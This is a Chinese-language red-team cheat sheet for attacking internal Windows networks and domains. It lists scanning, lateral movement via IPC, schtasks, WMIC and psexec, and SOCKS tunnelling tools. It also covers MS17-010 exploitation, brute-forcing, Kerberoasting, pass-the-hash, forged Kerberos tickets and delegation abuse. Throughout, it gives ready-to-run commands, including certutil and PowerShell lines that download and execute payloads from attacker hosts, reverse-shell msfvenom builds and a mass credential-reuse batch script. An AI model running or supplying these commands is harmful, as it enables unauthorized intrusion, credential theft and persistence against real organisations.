$sudo apt-get install clang git gcc make libpcap-dev$git clone https://github.com/robertdavidgraham/masscan$cd masscan$make >masscan -p80,3389,1-65535 192.168.0.0/24


PTScan

友好识别web服务
https://github.com/phantom0301/PTscan/blob/master/PTscan.py>python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306]  [-m 50] [-t 10] [-n(不ping)] [-b(开启banner扫描)] [-r查找IP]80,81,82,83,84,85,86,87,88,89,90,91,901,18080,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,443,8443,7001

CobaltStrike+K8 Aggressor

https://github.com/k8gege/Aggressor
存活主机
beacon>Cscan 192.168.0.0/24 OnlinePC


MS17010
beacon>Cscan 192.168.0.0/24 MS17010


操作系统信息
beacon>Cscan 192.168.0.0/24 Osscan


内网站点banner、标题扫描
beacon>Cscan 192.168.0.0/24 WebScan
FTP爆破
上传账户密码文件user.txt、pass.txt到beacon目录(beacon>pwd)beacon>Cscan 192.168.0.0/24 FtpScan
WMI爆破windows账户密码
上传账户密码文件user.txt、pass.txt到beacon目录(beacon>pwd)beacon>Cscan 192.168.0.0/24 WmiScan
思科设备扫描
beacon>Cscan 192.168.0.0/24 CiscoScan
枚举共享
beacon> EnumShare
枚举SQL SERVER数据库
beacon> EnumMSSQL

执行命令&IPC&计划任务

建立连接>net use \\192.168.1.2\ipc$ "password" /user:domain\administrator查看连接>net use列文件>dir \\192.168.1.2\c$查看系统时间>net time \\192.168.1.2上传文件>copy 1.exe \\192.168.1.2\c$下载文件>copy \\192.168.1.2\c$\1.exe 1.exe批量IPC@echo offecho check ip addr config file…if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto endecho read and analysis file…for /F "eol=#" %%i in (ip.txt) do start PsExec.exe \\%%i -accepteula -u administrator -p "123456" cmd & start cmd /c PsExec.exe \\%%i -u administrator -p "123456" cmd:endexit

AT


Schtasks
>net use \\192.168.1.2\ipc$ "password" /user:domain\administrator>copy 1.exe \\192.168.1.2\c$>net time \\192.168.1.2>at \\192.168.1.2 1:00AM c:\1.exe>at \\192.168.1.2 1:00AM cmd.exe /c “ipconfig >c:/1.txt”>type \\192.168.1.2\c$\1.txt查看计划任务>at \\192.168.1.2删除计划任务>at \\192.168.1.2 计划ID /delete横向批量上线>atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f http://youip.com:80/shell.txt c:/windows/debug/SysDug.exe" >atexec.exe ./administrator:pass@10.1.1.1 "c:/windows/debug/SysDug.exe" >atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f c:/windows/debug/SysDug.exe delete">net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator">schtasks /query /fo LIST /v 查看计划任务上传文件>copy ok.exe \\192.168.0.55\c$\windows\temp远程创建定时任务 >schtasks /create /s "192.168.0.55" /u "admin" /p "qqq23" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\ok.exe" /sc DAILY /mo 1 /ST 20:28 /RU SYSTEM查询远程创建的任务>schtasks /query /s "192.168.0.55" /U "admin" /P "qqq23" | findstr "windowsupdate" 立即执行远程任务>schtasks /run /tn windowsupdate /s "192.168.0.55" /U "admin" /P "qqq23" 删除定时任务 >schtasks /Delete /tn windowsupdate /F /s "192.168.0.55" /u "admin" /p "qqq23"删除IPC>net user name /del /y横向批量上线>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy ok.exe \\%i\admin$\debug\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\debug\ok.exe" & @ping 127.0.0.1 -n 8 >nul & net use \\%i\admin$ /del

WMIC

>net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator">copy ok.exe \\192.168.0.55\c$\windows\temp>wmic /NODE:" 192.168.0.55" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\ok.exe">del \\192.168.0.55\c$\windows\temp\ok.exe /F>net use \\192.168.0.55\c$ /del

快速定位域管理登过的机器

>psexec –accepteula @ips.txt –u admin –p pass@123 –c 1.bat#1.bat内容tasklist /v | find “域管理名字”@echo offecho check ip addr config file…if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto endecho read and analysis file…for /F “eol=#” %%i in (ip.txt) do echo %%i &(echo %%i &tasklist /s %%i /u administrator /p pass@123 /v) >>d:\result.txt:endexit

MSF添加路由

# route add 内网网卡ip 子网掩码 session的id# route list&Meterpreter>run get_local_subnets查看网段信息再添加路由# run autoroute -s内网网卡ip/24# run autoroute -p 查看路由表&Meterpreter>run post/multi/manage/autoroute

MSF管道监听

在已经获得meterpreter的机器上配置管道监听器meterpreter > pivot add -t pipe -l 已控IP -n bgpipe -a x86 -p windows生成>msfvenom -p windows/meterpreter/reverse_named_pipe PIPEHOST=已控IP PIPENAME=bgpipe -f exe -o pipe.exe.

代理

SSH

正向代理
SSH动态转发,是建立正向加密的socks通道出网靶机编辑后restart ssh服务#vim /etc/ssh/sshd_confAllowTcpForwarding yes 允许TCP转发GatewayPorts yes   允许远程主机连接本地转发的端口TCPKeepAlive yes    TCP会话保持存活PasswordAuthentication yes  密码认证外部攻击机执行>ssh -C -f -N -g -D 0.0.0.0:12138 root@出网靶机IP -p 22MSF中设置全局代理或使用其他软件>setg proxies socks5:0.0.0.0:12138即可进行攻击隔离区机器

反向代理
#vim /etc/ssh/sshd_confAllowTcpForwarding yes 允许TCP转发GatewayPorts yes   允许远程主机连接本地转发的端口TCPKeepAlive yes    TCP会话保持存活PasswordAuthentication yes  密码认证ClientAliveInterval 修改为30-60保持连接ClientAliveCountMax 取消注释 发送请求没响应自动断开次数107是外网攻击机内网靶机执行:

>ssh -p 22 -qngfNTR 12138:127.0.0.1:22 root@192.168.0.107

攻击机执行
>ssh -p 12138 -qngfNTD 12345 root@192.168.0.107

隧道建立,可使用代理软件配置攻击机外网IP:12345访问内网


SSH隧道+rc4双重加密
生成木马>msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 rc4password=123456 lport=446 -f exe -o /var/www/html/bind.exeMSF设置>setg proxies socks5:0.0.0.0:12138>use exploit/multi/handler>set payload windows/x64/meterpreter/bind_tcp_rc4>set rc4password 123456>set rhost 10.1.1.97>set lport 446


公网SSH隧道+Local MSF
>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=公网IP LPORT=12138 -f exe –o /var/www/html/1.exeHandler监听本地IP:12138SSH转发>ssh -N -R 12138:本地内网IP:12138 root@公网IP

socks4a

#use auxiliary/server/socks4a#set srvhost 0.0.0.0#set srvport 1080#run多层网络再多配置个端口Win: Proxifier& Sockscap64Linux: proxychains& 浏览器&meterpreter > ipconfig IP Address : 10.1.13.3 meterpreter > run autoroute -s 10.1.13.0/24 meterpreter > run autoroute -p 10.1.13.0 255.255.255.0 Session 1 meterpreter > bg msf auxiliary(tcp) > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 10.1.13.2 msf exploit(psexec) > exploit 

socks5


#use auxiliary/server/socks5#set srvhost 0.0.0.0#set srvport 1080#run


浏览器

基于web的socks5


reGeorghttps://github.com/sensepost/reGeorg>python reGeorgSocksProxy.py -u http://靶机/tunnel.aspx -l 外网IP -p 10080打开Proxifier,更改为脚本指定的端口10080


或proxychains
#vim /etc/proxychains.conf去掉dynamic_chain注释>添加socks5 127.0.0.1 10080

或MSF
或MSF>setg proxies socks5:外网IP:10080>setg ReverseAllowProxy true 允许反向代理


Neo-reGeorg


Step 1. 设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器$ python3 neoreg.py generate -k password



伪装页面


$ python3 neoreg.py generate -k <you_password> --file 404.htmlStep 2. 使用 neoreg.py 连接WEB服务器,在本地建立 socks 代理$ python3 neoreg.py -k password -u http://xx/tunnel.php$ python3 neoreg.py -k <you_password> -u <server_url> --skip开启代理$ python neoreg.py -k <you_password> -l 外网IP -p 10081 -u http://xx/neo-tunnel.aspx


ABPTTS端口转发


https://github.com/nccgroup/ABPTTS端口转发>python abpttsfactory.py -o webshell 生成shell./webshell目录下生成的相应脚本文件传入目标中>python abpttsclient.py -c webshell/config.txt -u "http://目标网址/trans.aspx" -f 攻击机IP:12345/目标IP:3389


ABPTTS转发内网其他机器端口


>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.105:3389


要转发多个机器或多个端口


>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.105:3389 -f 192.168.0.107:33891/10.1.1.101:80 -f 192.168.0.107:33892/10.1.1.102:22SSH代理一级网段需要一台有权限的Linux靶机>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.108:22>ssh -p 222 -qTfnN -D 0.0.0.0:1081 root@192.168.0.107


配置proxychains即可

SSH代理二级网段


需要靶机web权限,一级内网一台web权限转发内网web出来传入abptts的shell>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:8080/10.1.1.108:80 >python abpttsclient.py -c webshell/config.txt -u http://192.168.0.107/qq.aspx -f 192.168.0.107:222/10.1.1.106:22SSH连接192.168.0.107:222即可到达二级网络反弹msfkali生成bind型脚本>msfvenom -p linux/x64/shell_bind_tcp LPORT=12138 -f elf -o shell在二级不出网linux上执行将他的12138端口通过abptts转出>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:13128/10.1.1.101:12138Msf本地监听13128即可
Tunna转发


>python proxy.py -u http://192.168.0.98/tunnel.aspx -l 12138 -r 3389 –v


Earthworm


正向(目标机存在外网IP):


>ew –s ssocksd –l 888连接sockscap64靶机外网IP+端口888


反弹socks5(目标机无外网IP):
外网攻击机:>ew -s rcsocks -l 1008 -e 888-l为socks软件连接的端口,-e为目标主机和vps的通信端口。靶机:>ew -s rssocks -d 外网IP -e 1008 sockscap64连接攻击机外网IP+端口1008二级环境(A有外网,B内网无外网):靶机B:>ew –s ssocksd –l 888靶机A:>ew –s lcx_tran –l 1080 –f 靶机B –g 888Sockscap64连接靶机外网IP+端口 1080
二级环境(A无外网,B内网无外网):


外网攻击机:>ew –s lcx_listen –l 10800 –e 888靶机B:>ew –s ssocksd –l 999靶机A:>ew -s lcx_slave -d 外网 -e 8888 -f 靶机B -g 9999 Sockscap64连接攻击机外网IP+端口 10080


三级环境(A无外网,B内网无外网通A,C通B):
外网攻击机:>ew -s rcsocks -l 1008 -e 888靶机A:>ew -s lcx_slave -d 外网攻击机 -e 888 -f 靶机B -g 999靶机B:>ew -s lcx_listen -l 999 -e 777靶机C:>ew -s rssocks -d靶机B -e 777Sockscap64连接攻击机外网IP+端口 1008

Frp


https://github.com/fatedier/frp/releases/使用条件:目标主机通外网,拥有自己的公网ip对攻击机外网服务端frps.ini进行配置[common]bind_port=8080靶机客户端[common]server_addr=服务器端外网IPserver_port=8080[socks5]type=tcpremote_port=12345plugin=socks5use_encryption=trueuse_compression=true以上是启用加密和压缩,能躲避流量分析设备。上传frpc.exe和frpc.ini到目标服务器上,直接运行frpc.exe(在实战中可能会提示找不到配置文件,需要使用-c参数指定配置文件的路径frpc.exe -c 文件路径),可以修改文件名和配置名以混淆视听。公网vps主机上运行./frps –c frps.ini靶机执行./frpc –c frpc.ini



MSF中设置全局变量


>setg proxies 公网IP:12345>setg ReverseAllowProxy true 运行反向代理

结束攻击
tasklist taskkill /pid 进程号 -t –f

SSF

https://github.com/securesocketfunneling/ssf/releases


正向socks代理



边界机器执行:>ssfd.exe -p 1080 linux执行:./ssfd -p 1080


攻击机执行:

>ssf.exe -D 12138 -p 1080 192.168.0.98(边界机器IP)


本机配置proxychain或proxifier

反向socks代理


攻击机执行:>ssfd.exe -p 1080


内网机器执行:

>ssf.exe -F 12138 -p 1080 192.168.0.106(攻击机IP)

多级级联


多级内网机执行:>ssfd.exe -p 1080 -c config.jsonJson文件加入字段"circuit": [ {"host": "A中继机IP", "port":"1080"}, {"host": "B中继机IP", "port":"1080"} ],所有中继机执行:>ssfd.exe -p 1080 -c config.json边界机器执行:>ssf.exe -c config.json -p 1080 多级内网机IP -X 12138边界机执行:>nc.exe 127.0.0.1 12138即可获得多级内网机cmdshell
反弹shell


攻击机执行:>ssfd.exe -p 1080 -c config.json

内网机器执行
攻击机执行:
>nc 127.0.0.1 12138

Shadowsocks


https://github.com/shadowsocks/libQtShadowsocks/releases/download/v2.0.2/shadowsocks-libqss-v2.0.2-win64.7z靶机新建配置文件1.json,内容为{"server":"0.0.0.0","server_port":13337,"local_address":"127.0.0.1","local_port":1080,"password":"123456","timeout":300,"method":"aes-256-cfb","fast_open":false,"workers": 1}执行>shadowsocks-libqss.exe -c 1.json –S攻击机配置

浏览器或其他攻击软件配置代理127.0.0.1:1080即可(需有http(s)/socks5功能)



Goproxy


https://github.com/snail007/goproxy/releases靶机执行>proxy.exe socks -t tcp -p "0.0.0.0:13337"

攻击机配置Proxifier


Chisel


https://github.com/jpillora/chisel/releases攻击机监听>chisel.exe server -p 12138 --reverse



靶机执行
>chisel.exe client 192.168.0.102:12138 R:12345:127.0.0.1:12346

靶机执行

>chisel.exe server -p 12346 --socks5

攻击机执行
>chisel.exe client 127.0.0.1:12345 socks

当隧道建立成功时,攻击机本地会启动1080端口

即可使用


https://ngrok.com/https://www.ngrok.cc/下载ngrok#ngrok authtoken 授权码#ngrok http 8080#ngrok tcp 8888

代理软件

Sockscap64Proxifier Proxychains#vim /etc/proxychains.conf去掉dynamic_chain注释>添加socks4 127.0.0.1 1080#cp /usr/lib/proxychains3/proxyresolv /usr/bin

Ngrok内网穿透

https://ngrok.com/https://www.ngrok.cc/下载ngrok#ngrok authtoken 授权码#ngrok http 8080#ngrok tcp 8888

MS17-010


扫描#use auxiliary/scanner/smb/smb_ms17_010#set rhosts 192.168.1.0/24&#nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms17-010.nse 10.11.1.0/20攻击#use exploit/windows/smb/ms_17_010_eternalblue易蓝屏#set payload windows/x64/meterpreter/reverse_tcp#use auxiliary/admin/smb/ms17_010_command#set command REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f


MS08_067
#nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms08-067.nse 10.11.1.0/20#use exploit/windows/smb/ms08_067_netapi#set payload windows/meterpreter/reverse_tcpCVE-2019-0708

攻击MySQL数据库


#use auxiliary/scanner/mysql/mysql_version 主机发现#use auxiliary/scanner/mysql/mysql_login MYSQL爆破#use exploit/multi/mysql/mysql_udf_payload UDF提权#use exploit/windows/mysql/mysql_mof MOF提权#use auxiliary/admin/mysql/mysql_sql 执行命令

攻击MSSQL数据库


>PowerShell -Command "[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources()" 列出域内mssql主机https://github.com/NetSPI/PowerUpSQL>Get-SQLInstanceLocal          #发现本机SQLServer实例>Get-SQLInstanceDomain         #发现域中的SQLServer实例>Get-SQLInstanceBroadcast      #发现工作组SQLServer实例>$Targets = Get-SQLInstanceBroadcast -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_.Status -like "Accessible"} 工作组mssql爆破>$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_.Status -like "Accessible"}>Get-SQLInstanceBroadcast -Verbose | Get-SQLServerLoginDefaultPw –Verbose>$Targets 域内MSSQL爆破Nishang脚本爆破MSSQL>Invoke-BruteForce -ComputerName dc.zone.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose -StopOnSuccess#use auxiliary/scanner/mssql/mssql_login 爆破主机#use auxiliary/admin/mssql/mssql_exec 调用cmd#use auxiliary/admin/mssql/mssql_sql 执行SQL语句#use exploit/windows/mssql/mssql_payload 上线MSSQL主机http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1导入nishang执行MSSQL命令的脚本>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1')>Execute-Command-MSSQL -ComputerName 192.168.0.98 -UserName sa -Password admin 会返回powershell#use auxiliary/scanner/mssql/mssql_hashdump 导出MSSQL密码已知服务器ntlmhash,未知mssql账号密码Hash注入+socks无密码连接mssql>mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:. /ntlm:{hash} /run:\"C:\*\SocksCap64\SocksCap64_RunAsAdmin.exe\"" "exit"将SSMS.exe加入sockscap中启动命令行版sqltoolhttps://github.com/uknowsec/SharpSQLTools

隔离主机payload


隔离主机一般与攻击机无双向路由,payload设置为bind让靶机监听。>set payload windows/meterpreter/bind_tcp>set RHOST 隔离机IP


爆破

Hydra


参数:-l 指定的用户名 -p 指定密码-L 用户名字典  -P 密码字典-s 指定端口 -o 输出文件>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mysql>hydra -L /root/user.txt -P pass.txt 10.1.1.10 ssh -s 22 -t 4>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mssql -vv>hydra -L /root/user.txt -P pass.txt 10.1.1.10 rdp -V>hydra -L /root/user.txt -P pass.txt smb 10.1.1.10 -vV>hydra -L /root/user.txt -P pass.txt ftp://10.1.1.10

Medusa


参数:-h 目标名或IP  -H 目标列表-u 用户名 -U 用户名字典-p 密码 -P 密码字典 -f 爆破成功停止 -M 指定服务 -t 线程-n 指定端口 -e ns 尝试空密码和用户名密码相同>medusa -h ip -u sa -P /pass.txt -t 5 -f -M mssql>medusa -h ip -U /root/user.txt -P /pass.txt -t 5 -f -M mssql


域内爆破
Kerbrute


https://github.com/ropnop/kerbrute用户枚举>kerbrute_windows_amd64.exe userenum -d zone.com username.txt


密码喷射


>kerbrute_windows_amd64.exe passwordspray -d zone.com use.txt password



密码爆破
此项会产生日志


>kerbrute_windows_amd64.exe bruteuser -d zone.com pass.txt name

组合爆破
格式为username:password>kerbrute_windows_amd64.exe -d zone.com bruteforce com.txt
DomainPasswordSpray
https://github.com/dafthack/DomainPasswordSpray自动收集账户进行密码喷射>Invoke-DomainPasswordSpray -Password pass

组合爆破
>Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -PasswordList passlist.txt -OutFile result.txt会产生日志单密码>Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -Password password

方程式内网不产生session

msfvenom生成一个x64或x86的dll文件,替换该工具下的x64.dll或x86.dllwindows server 2008 ,msfvenom生成x64.dll文件msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x64.dllmsf配置use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lport 12345set lhost 192.168.0.107将该x64.dll替换到方程式利用工具下面。只需要更换目标的IP,就可以获取session。windows server 2003 ,msfvenom生成x86.dll文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x86.dllmsf配置use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lport 12345set lhost 192.168.0.107通过ms17_010_commend模块执行系统命令添加用户至管理员。再指定SMBPass和SMBUser来建立windows可访问命名管道


Kerberoasting
https://github.com/nidem/kerberoast

SPN发现

cmd


>setspn -T 域名 -Q */*

Powershell

https://github.com/PyroTek3/PowerShell-AD-Recon

Powerview>Get-NetComputer -SPN termsrv*>Get-NetUser -SPN

>import module GetUserSPNs.ps1
Empire
>usemodule situational_awareness/network/get_spn


申请票据

>Add-Type -AssemblyName System.IdentityModel>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN"&>kerberos::ask /target:SPN

导出票据

mimikatz>kerberos::list /export

破解密码

>python tgsrepcrack.py word.txt file.kirbihttps://github.com/leechristensen/tgscrack>python extractServiceTicketParts.py file.kirbi>tgscrack.exe -hashfile hash.txt -wordlist word.txt


重写票据

>python kerberoast.py -p Password123 -r file.kirbi -w new.kirbi -u 500>python kerberoast.py -p Password123 -r file.kirbi -w new.kirbi -g 512注入内存、>kerberos::ptt new.kirbi

GetUserSPNs

https://github.com/SecureAuthCorp/impacket请求TGS>python GetUserSPNs.py -request -dc-ip 10.1.1.1 zone.com/y破解>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt

ASEPRoasting

当用户关闭了kerberos预身份认证时可以进行攻击

>Rubeus.exe asreproast /user:y /dc:10.1.1.100 /domain:zone.com

或使用Powerview结合https://github.com/gold1029/ASREPRoast
获取不要求kerberos预身份验证的域内用户

>Get-DomainUser -PreauthNotRequired -Properties distinguishedname –Verbose

>Get-ASREPHash -UserName y -Domain zone.com -Verbose

破解RC4-HMAC AS-REP
>john hash.txt --wordlist=wordlist.txt


PASS-THE-HASH

允许本地管理组所有成员连接>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f  

WMIExec & TheHash

>powershell -ep bypass>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-WMIExec.ps1'); >IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-TheHash.ps1');>Invoke-TheHash -Type WMIExec -Target 192.168.0.0/24 -Domain zone.com -Username godadmin -Hash f1axxxxxxxxxb771


WMI

>net use \\1.1.1.1\admin$ /user:"administrator" "password">copy windowsupdate.exe \\1.1.1.1\admin$\dir\>wmic /NODE:"1.1.1.1" /user:"administrator" /password:"password" PROCESS call create "c:\windows\dir\windowsupdate.exe" >del \\1.1.1.1\admin$\dir\windowsupdate.exe /F >net use \\1.1.1.1\admin$ /del


wmiexec.py
https://github.com/SecureAuthCorp/impacket >python wmiexec.py -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 域名/Administrator@192.168.11.1 "whoami">python wmiexec.py admin@192.168.1.2

wmiexec.vbs
半交互式:>cscript //nologo wmiexec.vbs /shell 192.168.1.2 admin pass单条命令>cscript //nologo wmiexec.vbs /cmd 192.168.1.2 domain\admin pass "whoami"下载执行>wmic /node:192.168.0.115 /user:godadmin /password:password PROCESS call create "cmd /c certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe c:/windows/temp/win.exe & c:/windows/temp/win.exe & certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe delete"


Powershell
>wmic /NODE:192.168.3.108 /user:"godadmin" /password:"password" PROCESS call create "powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.107/xxx.txt');\""Invoke-WMIExec>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1a5b1a3641bec99ff92fe9df700b771 -Command \"net user admin Qwe@123 /add\" -Verbose"

>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1xxxxxxxxxxxxx771 -Command \"mshta http://192.168.0.107:8080/YAyAPN6odzbAzKn.hta\" -Verbose"

Psexec


>psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09域名/Administrator@192.168.1.1 "whoami"
>psexec.exe –accepteula \\192.168.1.2 –u admin –p pass cmd.exe 无确认窗
Msf
#use exploit/windows/smb/psexec
#use exploit/windows/smb/psexec_psh(powershell版本)

Mimikatz

Windows XP、Vista、200872008 r2 和2012没有安装KB2871997补丁的机器上,使用NTLM进行PTHmimikatz # privilege::debugmimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm}执行一个文件mimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm} /run:powershell.exeWindows 8.12012 R2、安装KB2871997的Win 72008 R2和2012上可使用AES KEY进行PTH>privilege::debug>sekurlsa::ekeys>sekurlsa::pth /user:administrator /domain:zone.com /aes128:{key}

pth-winexe

>pth-winexe -U godadmin%password --system --ostype=1 //192.168.0.115 cmd


Smbexec

>python smbexec.py administrator@192.168.0.98


PASS-THE-TICKET

名词KDC(Key Distribution Center):密钥分发中心,里面包含两个服务:AS和TGSAS(Authentication Server):身份认证服务TGS(Ticket Granting Server):票据授予服务TGT(Ticket Granting Ticket): 由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时

黄金票据+Mimikatz

Golden Ticket伪造TGT(Ticket Granting Ticket),可以获取任何Kerberos服务权限,域控中提取krbtgthash域控:dc.zone.com域内机器:sub2k8.zone.com域内普通用户:y域内机器是不能访问dc上的文件


清空票据

域控中获取krbtgt用户的信息
>privilege::debug>mimikatz log "lsadump::dcsync /domain:zone.com /user:krbtgt"获取信息:/domain、/sid、/aes256


在sub2k8中生成golden ticket
>mimikatz “kerberos::golden /krbtgt:{ntlmhash} /admin:域管理 /domain:域名 /sid:sid /ticket:gold.kirbi”


导入
Mimikatz#kerberos::ptt 123.kirbi


白银票据+Mimikatz

Silver Ticket是伪造的TGS,只能访问指定服务权限域控:dc.zone.com域内机器:sub2k8.zone.com域内普通用户:y域控中导出>privilege::debug>sekurlsa::logonpasswords

Sub2k8伪造票据
>mimikatz "kerberos::golden /domain:zone.com /sid:{SID} /target:dc.zone.com /service:cifs /rc4:{NTLM} /user:y /ptt"


MS14-068

https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe域控:dc.zone.com/10.1.1.100域内机器:sub2k8.zone.com/10.1.1.98域内普通用户:y,Sub2k8中清除票据Mimikatz#kerberos::purge>whoami /user查看SID 创建ccache票据文件> MS14-068.exe -u y@zone.com -p password -s S-1-5-21-2346829310-1781191092-2540298887-1112 -d dc.zone.com注入票据Mimikatz# Kerberos::ptc c:\xx\xx\xxx.ccachepsexec无密码登陆>PsExec.exe \\dc.xx.com\ cmd.exe

Mimikatz+MSF

>whoami /user 查看SIDmsf >use auxiliary/admin/kerberos/ms14_068_kerberos_checksummsf >set domain 域名msf >set password 密码msf >set rhost 域控机器msf >set user 用户msf >set user_sid sid得到.bin文件#apt-get install krb5-user上传mimikatz和bin文件Mimikatz# Kerberos::clist “xxxx.bin” /export生成kirbi文件Meterpreter >load kiwiMeterpreter >download c:/wmpub/xxxxxx.kirbi /tmp/注入票据Meterpreter >kerberos_ticket_use /tmp/xxxxxx.kirbi#use exploit/windows/local/current_user_psexec#set TECHNIQUE PSH#set RHOST dc.xx.com#set payload windows/meterpreter/reverse_tcp#set LHOST 192.168.1.1#set session 1#exploit

goldenPac.py

#exploitkali下#apt-get install krb5-user#goldenPac.py –dc-ip 10.1.1.100 –target-ip 10.1.1.100 zone.com/y:password@dc.zone.com

账户委派

账户非受限委派

设置用户y为服务账户(服务账户有委派权限)
>setspn -U -A variant/golden y


查询非受限委派域内账号,使用powerview
>Get-NetUser -Unconstrained -Domain zone.com

利用
管理员权限打开mimikatz导出TGT>privilege::debug>sekurlsa::tickets /export

清空票据,导入票据

获得Powershell会话
> Enter-PSSession -ComputerName dc.zone.com


账户受限委派

查询受限委派用户
> Get-DomainUser -TrustedToAuth –Domain zone.com

查询受限委派主机
> Get-DomainComputer -TrustedToAuth -Domain zone.com

利用方法后见权限维持模块

资源受限委派

获取域管理员>Get-DomainUser|select -First 1域对象信息>Get-DomainObject -Identity 'DC=zone,DC=com'ms-ds-machineaccountquota允许非特权用户将最多 10 台计算机连接到域

查看有没有设置msDS-AllowedToActOnBehalfOfOtherIdentity策略
>Get-DomainComputer dc|select name, msDS-AllowedToActOnBehalfOfOtherIdentity

用powermad添加一具备SPN的机器账户
https://github.com/Kevin-Robertson/Powermad>New-MachineAccount -MachineAccount newcom


>$pass = ConvertTo-SecureString '123qwe!@#' -AsPlainText –Force>New-MachineAccount –MachineAccount newcom -Password $pass>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)

获取添加的机器账户的SID

将添加的机器账户的SID设置给DC的msDS-AllowedToActOnBehalfOfOtherIdentity参数>$SD=New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2346829310-1781191092-2540298887-1122)"; $SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
设置完成后查看

配置ACL允许访问
>$RawBytes=Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity' |select -expand msds-allowedtoactonbehalfofotheridentity;$Descriptor= New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes,0;$Descriptor.DiscretionaryAcl

此时使用创建的机器账户的hash可伪造域管
先获取newcom的NTLM

>Rubeus.exe hash /password:123qwe!@# /user:newcom /domain:zone.com

导入票据伪造域管用户访问cifs服务
>Rubeus.exe s4u /user:newcom$ /rc4:00AFFD88FA323B00D4560B F9FEF0EC2F /impersonateuser:godadmin /msdsspn:cifs/dc.zone.com /ptt

成功获取到godadmin的tgs

CVE-2019-0708

